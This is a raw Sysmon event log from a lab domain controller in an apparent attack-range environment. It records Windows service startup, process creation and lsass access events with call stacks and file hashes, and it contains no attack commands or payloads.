12:01:01.317{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.317{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.316{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.296{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.295{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.270{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.270{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.252{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.252{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.005{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=44CFD427E8845A455BDE9B7284CD042B,SHA256=EAD9E26AF8996DDC2723D3D393F31D16DBEBDF448702BBBC60BB19831970C7AA,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.237{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.221{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.234{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B344B812DD6C294360563E52B2EF1C13,SHA256=0A4CA31848D7513F97F72D0292F5BBEE1CA409AAFFCACDE5369E12003B34118D,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.158{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.158{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.143{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.143{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.143{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.143{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.127{266CAFBE-647D-6064-3600-00000000AE01}2704\netdfsC:\Windows\system32\dfssvc.exe 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.127{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.127{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.127{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exe10.0.14393.4169 (rs1_release.210107-1130)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F2483716D6C752FB448C7295AA3B49A1,SHA256=6B77249159D3C217694B52F0B1C75E0649486EF4A3FE4513CD41D81E7DEB709A,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.127{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 